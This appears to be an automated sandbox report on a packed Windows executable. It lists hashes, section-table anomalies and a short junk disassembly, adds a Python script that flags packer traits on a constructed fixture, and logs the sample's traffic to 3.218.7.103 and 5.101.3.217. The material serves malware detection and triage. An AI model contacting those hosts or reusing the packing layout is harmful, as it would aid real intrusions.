                                                  SSDEEP:98304:luk8dUe4UmUcvXT/aCnlXt2csbEqkpe6aYp2reuju193f:lR8dUem9vuCnfRvqweXr0Hf
                                                  TLSH:9726334ED7546BF3C28FCB3DBAD1A0B956FCE0A935F8B244137859BC683A6416421ED0
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2... ....... I...@..........................P.......&D...@... ............................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x1022000
                                                  Entrypoint Section:.taggant
                                                  Digitally signed:true
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                  DLL Characteristics:DYNAMIC_BASE
                                                  Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                  Signature Valid:
                                                  Signature Issuer:
                                                  Signature Validation Error:
                                                  Error Number:
                                                  Not Before, Not After
                                                    Subject Chain
                                                      Version:
                                                      Thumbprint MD5:
                                                      Thumbprint SHA-1:
                                                      Thumbprint SHA-256:
                                                      Serial:
                                                      Instruction
                                                      jmp 00007FCBA0C1418Ah
                                                      psadbw mm0, qword ptr [ebx+00h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      jmp 00007FCBA0C16185h
                                                      add byte ptr [edx], al
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], dh
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], ch
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [esi], al
                                                      add byte ptr [eax], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [edx], ecx
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      or byte ptr [eax+00000000h], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add al, 00h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      and al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], eax
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      xor byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      and al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], eax
                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc1ffc0 | 0x10 | fnsraptz
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc1ff70 | 0x18 | fnsraptz
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x6db000 | 0x288a00 | c3294a2f9e776ce54e3b192f02682391 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 5508199accf3cf8348dd10ebf4967352 | False | 0.583984375 | data | 4.538450135579209 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x6de000 | 0x38d000 | 0x200 | 9341f30d5a42c4b79eddb1841be18218 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fnsraptz | 0xa6b000 | 0x1b6000 | 0x1b5200 | a39138b1a43c9e104a540da0928c30f5 | False | 0.9945907876394052 | data | 7.95651354910041 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qkzalnio | 0xc21000 | 0x1000 | 0x400 | 3264b79d8cb10e9a14b164183db9465c | False | 0.7939453125 | data | 6.2108752336856154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc22000 | 0x3000 | 0x2200 | 2e0cc20c6ed2bac64ecc6ce5f556daf7 | False | 0.05514705882352941 | DOS executable (COM) | 0.635619287468579 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc1ffd0 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
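The section table and entry point listed above are the raw material for the packer heuristics this report raises: the entry point sits in .taggant rather than .text, two sections have no name and two have random eight-letter names, every code-bearing section is mapped read/write/execute, fnsraptz has an entropy of 7.96 bits per byte, and the first section reserves 0x6db000 bytes of virtual space for only 0x288a00 bytes of file data, which is where an unpacker writes its decrypted payload. The script below is an added example, not Joe Sandbox code: it parses a PE32 section table in pure Python (no pefile dependency) and applies those heuristics. The standard-name list, the 7.0 bits/byte entropy cut-off and the 4x virtual-to-raw ratio are the example's own assumptions, and the image it triages is a fixture constructed in memory to mirror the section layout above, not the sample itself.

```python
"""Pure-Python triage of a PE32 section table (no pefile dependency).

Added example, not Joe Sandbox code. Reproduces section-table heuristics of the
kind behind this report's flags (entry point outside standard sections, unnamed or
non-standard section names, RWX sections, high entropy, VirtualSize >> raw size)
on a minimal PE32 image constructed in memory below, modelled on the report's table.
"""
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000   # winnt.h section characteristics
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                          ".reloc", ".bss", ".tls", ".pdata", ".xdata", ".CRT"}
ENTROPY_THRESHOLD = 7.0   # bits/byte (assumed cut-off); packed or encrypted data sits near 8
VSIZE_RATIO = 4           # VirtualSize this many times SizeOfRawData: room for unpacked code


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes):
    """DOS header -> PE signature -> COFF -> PE32 optional header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    _, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:   # PE32 only, as in the report
        raise ValueError("not a PE32 optional header")
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]   # AddressOfEntryPoint
    sections, off = [], opt + opt_size
    for _ in range(num_sections):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, off)   # 40-byte IMAGE_SECTION_HEADER
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
        off += 40
    return entry_rva, sections


def triage(image: bytes) -> dict:
    """Apply the heuristics; findings are (flag, section_name) tuples."""
    entry_rva, sections = parse_sections(image)
    findings, entry_section = [], None
    for s in sections:
        name = s["name"]
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = name
        if name not in STANDARD_SECTION_NAMES:
            findings.append(("nonstandard_name", name))
        if any(not 0x20 < ord(c) < 0x7F for c in name):
            findings.append(("special_chars_in_name", name))
        if s["chars"] & RWX == RWX:
            findings.append(("rwx", name))
        if s["entropy"] >= ENTROPY_THRESHOLD:
            findings.append(("high_entropy", name))
        if s["vsize"] > VSIZE_RATIO * max(s["rawsize"], 1):
            findings.append(("vsize_exceeds_raw", name))
    if entry_section not in STANDARD_SECTION_NAMES:   # None (entry in no section) counts too
        findings.append(("entry_outside_standard_section", entry_section))
    return {"entry_rva": entry_rva, "entry_section": entry_section,
            "sections": sections, "findings": findings}


def build_pe32(sections, entry_rva, file_align=0x200) -> bytes:
    """Assemble a minimal PE32 from (name, va, vsize, chars, payload) tuples (fixture only)."""
    dos = bytearray(b"MZ").ljust(64, b"\0")
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    opt = bytearray(224)                                       # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                      # magic
    struct.pack_into("<I", opt, 16, entry_rva)                 # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, file_align)  # ImageBase, alignments
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    hdr_end = 64 + 4 + len(coff) + len(opt) + 40 * len(sections)
    raw_ptr = first_raw = -(-hdr_end // file_align) * file_align
    headers, bodies = bytearray(), bytearray()
    for name, va, vsize, chars, payload in sections:
        rawsize = -(-len(payload) // file_align) * file_align
        headers += struct.pack("<8sIIIIIIHHI", name.encode("latin-1")[:8], vsize, va,
                               rawsize, raw_ptr, 0, 0, 0, 0, chars)
        bodies += payload.ljust(rawsize, b"\0")
        raw_ptr += rawsize
    return bytes(dos + b"PE\0\0" + coff + opt + headers).ljust(first_raw, b"\0") + bytes(bodies)


def build_sample() -> bytes:
    """Constructed fixture shaped like the report's section table (not the real file)."""
    rng = random.Random(1)
    packed = bytes(rng.getrandbits(8) for _ in range(0x1000))     # stands in for packed code
    stub = b"\xe9\x00\x00\x00\x00".ljust(0x2200, b"\0")            # mostly-empty unpacker stub
    rw = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_pe32([
        ("",         0x001000, 0x6db000, RWX, b"\0" * 0x200),      # unnamed, huge VirtualSize
        (".rsrc",    0x6dc000, 0x0001ac, rw, b"<assembly/>"),
        ("fnsraptz", 0xa6b000, 0x001000, RWX, packed),
        (".taggant", 0xc22000, 0x003000, RWX, stub),
    ], entry_rva=0xc22000)


SAMPLE_IMAGE = build_sample()
```

On the fixture, triage() places the entry point in .taggant and flags the unnamed, fnsraptz and .taggant sections while leaving .rsrc clean; handing parse_sections() the bytes of a real PE32 (open(path, "rb").read()) works the same way, and the per-section entropy it computes over the raw data is the quantity shown in the Entropy column above. The section containment test uses max(VirtualSize, SizeOfRawData) because a packer's stub section may have a raw size larger than its declared virtual size.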
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 09:07:39.324563980 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:39.324634075 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:39.324708939 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:39.346550941 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:39.346587896 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.222374916 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.224447012 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.224477053 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.225934029 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.226084948 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.227821112 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.227900982 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.286963940 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.286989927 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.333827019 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.336160898 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.383348942 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.666089058 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.666213989 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:41.666285038 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.676435947 CET | 49716 | 443 | 192.168.2.9 | 3.218.7.103
Dec 27, 2024 09:07:41.676455975 CET | 443 | 49716 | 3.218.7.103 | 192.168.2.9
Dec 27, 2024 09:07:44.422456980 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.542120934 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.542202950 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.544317007 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664053917 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664081097 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664091110 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664109945 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664120913 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664118052 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664144039 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664186954 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664195061 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664237022 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664263964 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664274931 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664326906 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.664340973 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664352894 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.664365053 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.783828974 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783844948 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783864021 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783873081 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783890963 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.783915997 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783926010 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.783942938 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.783958912 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.827691078 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.827817917 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.943660975 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:44.943742037 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:44.987652063 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:45.103703022 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:45.103759050 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:45.303611040 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:45.303667068 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:45.543704033 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:45.543792963 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
Dec 27, 2024 09:07:45.566395044 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.9
Dec 27, 2024 09:07:45.566603899 CET | 49727 | 80 | 192.168.2.9 | 5.101.3.217
                                                      Dec 27, 2024 09:07:45.566668034 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.663368940 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.663435936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686336040 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686371088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686383963 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686400890 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686471939 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686510086 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686532974 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686690092 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686733961 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686748981 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686779022 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686882019 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686899900 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.686923027 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.686958075 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687031031 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687134027 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687171936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687190056 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687278032 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687396049 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687442064 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687614918 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687673092 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687699080 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.687738895 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.687784910 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688033104 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688191891 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688309908 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688446999 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688604116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688826084 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.688941956 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689112902 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689218998 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689287901 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689348936 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689376116 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689450026 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689490080 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689632893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689660072 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689677000 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689694881 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689804077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.689846039 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.689861059 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.690247059 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.731622934 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.731817007 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.783168077 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.783288956 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.805942059 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806019068 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806034088 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806117058 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806132078 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806267023 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806268930 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.806346893 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806432962 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806621075 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806729078 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806826115 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.806906939 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807001114 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807061911 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807188034 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807324886 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807356119 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807446957 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807478905 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.807693958 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.808904886 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.808934927 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.808943033 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.808979988 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809079885 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809114933 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809132099 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809154034 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809169054 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809197903 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809232950 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809416056 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809426069 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809458017 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809472084 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809529066 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809545994 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809580088 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809602022 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809628963 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809645891 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809663057 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809684992 CET4972780192.168.2.95.101.3.217
                                                      Dec 27, 2024 09:07:45.809763908 CET80497275.101.3.217192.168.2.9
                                                      Dec 27, 2024 09:07:45.809813023 CET4972780192.168.2.95.101.3.217
